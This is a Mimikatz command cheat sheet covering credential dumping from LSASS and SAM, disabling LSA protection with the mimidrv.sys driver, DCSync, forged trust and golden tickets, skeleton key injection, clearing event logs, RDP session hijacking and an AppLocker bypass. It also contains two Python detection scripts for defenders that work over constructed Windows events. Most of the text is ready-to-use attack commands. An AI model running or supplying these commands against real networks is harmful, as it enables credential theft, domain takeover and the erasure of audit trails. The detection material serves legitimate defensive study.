PPL protection is controlled by a bit in the EPROCESS kernel object associated with the target process. If we could obtain code execution in kernel space, we could clear that bit, disable the LSA protection and dump the credentials.
This can be achieved with Mimikatz, since it comes bundled with the mimidrv.sys driver.
We must be local administrator or SYSTEM to dump the credentials, which means we also hold SeLoadDriverPrivilege and can load any signed driver. Mimikatz loads mimidrv.sys with the !+ command:
mimikatz # !+
Once the driver is loaded, it can be used to disable the PPL protection for LSASS. With LSA PPL disabled, the usual dump works again:
mimikatz # sekurlsa::logonpasswords
While this technique disables LSA Protection, it requires uploading the mimidrv.sys driver to the victim machine, which may trigger antivirus.
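A defender-side check that pairs with the driver-load technique above, added here as an example and not part of the original cheat sheet or of Mimikatz: Python over constructed Sysmon-style events that flags a kernel driver loaded from outside a baseline (Sysmon Event ID 6, which is where a mimidrv.sys load shows up, and note that the driver is validly signed, so signature status alone is not a signal) and a non-allowlisted process opening lsass.exe with memory-read rights (Sysmon Event ID 10). Field names follow Sysmon's schema; the allowlist, the driver baseline and the sample events are assumptions to tune per environment.

```python
"""Constructed Sysmon-style events (not real telemetry) used to show two
detections: an unexpected kernel driver load (Sysmon Event ID 6) and a
non-allowlisted process opening LSASS with memory-read access (Event ID 10)."""

# Access-mask bits that a credential dump needs on the LSASS handle:
# PROCESS_VM_READ (0x0010) and PROCESS_QUERY_INFORMATION (0x0400).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Processes that legitimately open LSASS on a typical host.
# Assumption: tune this list to the environment.
LSASS_ACCESS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\msmpeng.exe",  # hypothetical AV engine path
}

# Kernel drivers expected on the host. Assumption: build this from a
# golden-image baseline rather than hand-typing it.
DRIVER_BASELINE = {"ntoskrnl.exe", "hal.dll", "ntfs.sys", "tcpip.sys"}


def check_driver_load(event):
    """Sysmon Event ID 6: flag a known credential-theft driver, a driver whose
    Authenticode signature did not validate, or any driver outside the baseline."""
    if event["EventID"] != 6:
        return None
    path = event["ImageLoaded"]
    image = path.rsplit("\\", 1)[-1].lower()
    if image == "mimidrv.sys":
        return f"known credential-theft driver loaded: {path}"
    if event.get("SignatureStatus", "").lower() != "valid":
        return f"driver with invalid signature loaded: {path}"
    if image not in DRIVER_BASELINE:
        return f"driver outside baseline loaded: {path}"
    return None


def check_lsass_access(event):
    """Sysmon Event ID 10: flag a non-allowlisted source that opens lsass.exe
    with rights sufficient to read its memory."""
    if event["EventID"] != 10:
        return None
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return None
    if event["SourceImage"].lower() in LSASS_ACCESS_ALLOWLIST:
        return None
    granted = int(event["GrantedAccess"], 16)
    if granted & (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION):
        return (f"{event['SourceImage']} opened lsass.exe with "
                f"GrantedAccess=0x{granted:x}")
    return None


def scan(events):
    """Run both checks over a list of events and return the alert strings."""
    alerts = []
    for ev in events:
        for check in (check_driver_load, check_lsass_access):
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample events; paths and masks are invented for the example.
SAMPLE_EVENTS = [
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "SignatureStatus": "Valid"},
    {"EventID": 6, "ImageLoaded": r"C:\Users\bob\Downloads\mimidrv.sys",
     "SignatureStatus": "Valid"},  # validly signed, still an alert
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print("ALERT:", line)
```

The last sample (GrantedAccess 0x1000, PROCESS_QUERY_LIMITED_INFORMATION only) is deliberately not flagged: many legitimate tools open LSASS with limited query rights, and alerting on every handle drowns the real signal. Enabling RunAsPPL is the preventive control this detection backs up; the driver-load rule is what catches the bypass the section above describes.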
List commands in module
Just type in the name of the module followed by :: and press enter
kerberos::
sekurlsa::
Base64 output of commands
base64 /out:true
base64 /out:false
Dump the SAM file
lsadump::sam
lsadump::sam /patch
Event
Drop new event log entries so nothing further is written to the logs
event::drop
Clear all event logs
event::clear
lsadump
LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.
LSADUMP::Secrets – get the SysKey to decrypt SECRETS entries (from registry or hives).
LSADUMP::SetNTLM – Ask a server to set a new password/ntlm for one user.
LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).
sekurlsa
messing with LSA:
# list LM & NTLM credentials
mimikatz sekurlsa::msv
# Lists WDigest credentials
mimikatz sekurlsa::wdigest
# Lists Kerberos credentials (I've seen this pull plain-text passwords)
mimikatz sekurlsa::kerberos
# Lists TsPkg credentials
mimikatz sekurlsa::tspkg
# Lists LiveSSP credentials
mimikatz sekurlsa::livessp
# Lists SSP credentials
mimikatz sekurlsa::ssp
# Lists all available providers credentials
mimikatz sekurlsa::logonPasswords
# Switch (or reinit) to LSASS process context
mimikatz sekurlsa::process
# Switch (or reinit) to LSASS minidump context
mimikatz sekurlsa::minidump
# Antisocial :)
mimikatz sekurlsa::trust
# Preferred Backup Master keys
mimikatz sekurlsa::backupkeys
# List Kerberos tickets
mimikatz sekurlsa::tickets
# List Kerberos Encryption Keys
mimikatz sekurlsa::ekeys
# List Cached MasterKeys
mimikatz sekurlsa::dpapi
# List Credentials Manager
mimikatz sekurlsa::credman
# List all tokens
token::list
# Important tokens
token::list /user:administrator
token::list /user:domainadmin
token::list /user:enterpriseadmin
token::list /user:system
# Run a process with a token
token::run /process:cmd.exe
# Get / revert those privileges
token::revert
token::elevate
kerberos
KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.
Similar to functionality of “klist”.
KERBEROS::PTC – pass the cache (NT6)
*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.
KERBEROS::PTT – pass the ticket
After a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required.
Similar to SEKURLSA::PTH (Pass-The-Hash).
/filename – the ticket’s filename (can be multiple)
/directory – a directory path; all .kirbi files inside it will be injected.
KERBEROS::Purge – purge all Kerberos tickets
Similar to functionality of “klist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used.
KERBEROS::TGT – get current TGT for current user.
MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller.
"privilege::debug" "misc::skeleton"
Trust Ticket
Once the Active Directory Trust password hash is determined, a trust ticket can be generated. The trust tickets are created using the shared password between 2 Domains that trust each other.
Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging SIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust.
# Dumping trust passwords (trust keys)
Mimikatz "privilege::debug" "lsadump::trust /patch" exit
# Create a forged trust ticket (inter-realm TGT) using Mimikatz
Mimikatz "Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi" exit
# Parameters:
/target – the target domain’s FQDN.
/service – the Kerberos service running in the target domain (krbtgt).
/rc4 – the NTLM hash of the Kerberos service account (krbtgt).
/ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.
DCShadow / DCSync
LSADUMP::DCShadow
Registers the current machine as a DC so it can push new objects and attribute changes into the directory (persistence method). This requires full AD admin rights or the KRBTGT password hash. DCShadow temporarily sets the computer to be a "DC" for the purposes of replication: it creates 2 objects in the AD forest Configuration partition.
LSADUMP::DCSync
Asks a DC to synchronize an object (i.e. get the password data for an account). Requires membership in Domain Admins, the domain Administrators group, or custom delegation of the replication rights.
Mimikatz "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt" exit
Mimikatz "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit
# DCSync Options:
/all – DCSync pull data for the entire domain.
/user – user id or SID of the user you want to pull the data for.
/domain (optional) – FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. If this parameter is not provided, Mimikatz defaults to the current domain.
/csv – export to csv
/dc (optional) – Specify the Domain Controller you want DCSync to connect to and gather data.
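Matching Security-log detections for the event::clear command in the Event section and for lsadump::dcsync here, added as one example that is not code from this page or from Mimikatz: Python over constructed Windows Security events that flags Event ID 1102 (the audit log was cleared; the Event Log service writes this record after the clear, so it survives and names the account) and Event ID 4662 where an account that is not a DC computer account exercises the DS-Replication control-access rights, which is the directory-side footprint of DCSync. The three GUIDs are the real replication rights; the allowlist, the simplified Properties field and the sample events are assumptions.

```python
"""Constructed Windows Security events (not real telemetry) used to show two
detections: a cleared Security log (Event ID 1102) and replication rights
exercised by a non-DC account (Event ID 4662 with the DS-Replication GUIDs)."""

# Control-access right GUIDs that grant directory replication.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts that legitimately replicate besides DC computer accounts
# (which end in '$'), e.g. a directory-sync service account. Assumption:
# populate from the environment; lower-case names.
REPLICATION_ALLOWLIST = set()


def check_log_cleared(event):
    """Event ID 1102: the Security log was cleared. Always worth an alert."""
    if event["EventID"] != 1102:
        return None
    return (f"Security log cleared by {event['SubjectDomainName']}\\"
            f"{event['SubjectUserName']} on {event['Computer']}")


def check_dcsync(event):
    """Event ID 4662: flag replication rights requested by anything other
    than a DC computer account or an allowlisted account."""
    if event["EventID"] != 4662:
        return None
    user = event["SubjectUserName"]
    if user.endswith("$") or user.lower() in REPLICATION_ALLOWLIST:
        return None
    # Real 4662 Properties fields carry extra tokens; here the field is
    # simplified to whitespace-separated {GUID} entries (assumption).
    requested = {g.strip("{}").lower() for g in event["Properties"].split()}
    hits = sorted(REPLICATION_GUIDS[g] for g in requested & set(REPLICATION_GUIDS))
    if not hits:
        return None
    return (f"{event['SubjectDomainName']}\\{user} requested "
            f"{', '.join(hits)} on {event['Computer']}")


def scan(events):
    """Run both checks over a list of events and return the alert strings."""
    alerts = []
    for ev in events:
        for check in (check_log_cleared, check_dcsync):
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample events; hostnames, accounts and the unrelated GUID are invented.
SAMPLE_EVENTS = [
    # Normal DC-to-DC replication: computer account, ignored.
    {"EventID": 4662, "Computer": "dc01.lab.example", "SubjectDomainName": "LAB",
     "SubjectUserName": "DC02$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account exercising replication rights: DCSync footprint.
    {"EventID": 4662, "Computer": "dc01.lab.example", "SubjectDomainName": "LAB",
     "SubjectUserName": "jdoe",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # 4662 for an unrelated property (placeholder GUID): not replication, ignored.
    {"EventID": 4662, "Computer": "dc01.lab.example", "SubjectDomainName": "LAB",
     "SubjectUserName": "jdoe", "Properties": "{00000000-0000-0000-0000-000000000001}"},
    # The record left behind by clearing the Security log.
    {"EventID": 1102, "Computer": "ws07.lab.example", "SubjectDomainName": "LAB",
     "SubjectUserName": "jdoe"},
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Event ID 4662 is only generated when the "Directory Service Access" audit subcategory is enabled and the domain object carries a SACL for the replication rights, so check that before relying on this rule; a cleared System log leaves Event ID 104 in the System log rather than 1102, which the same pattern covers.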
NetSync
NetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account’s information including the password data.
# Allow multi-session RDP
ts::multirdp
# List all current sessions
ts::sessions
# Take over the specified session
ts::remote /id:1
# Pass RDP session into another session ID
ts::remote /id:1 /target:2
# Use the password of the user who owns the session
ts::remote /id:1 /password:F@ll2019!
AppLocker bypass
The misc module in Mimikatz can launch applications that AppLocker or similar policies may otherwise block.
misc::cmd
misc::regedit
# Lists the registered file-system minifilter drivers, which reveals whether Sysmon, Kaspersky or other AV/EDR filters are present
misc::mflt
# This will inject into explorer.exe for sneakiness
misc::wp /file:tacos.jpg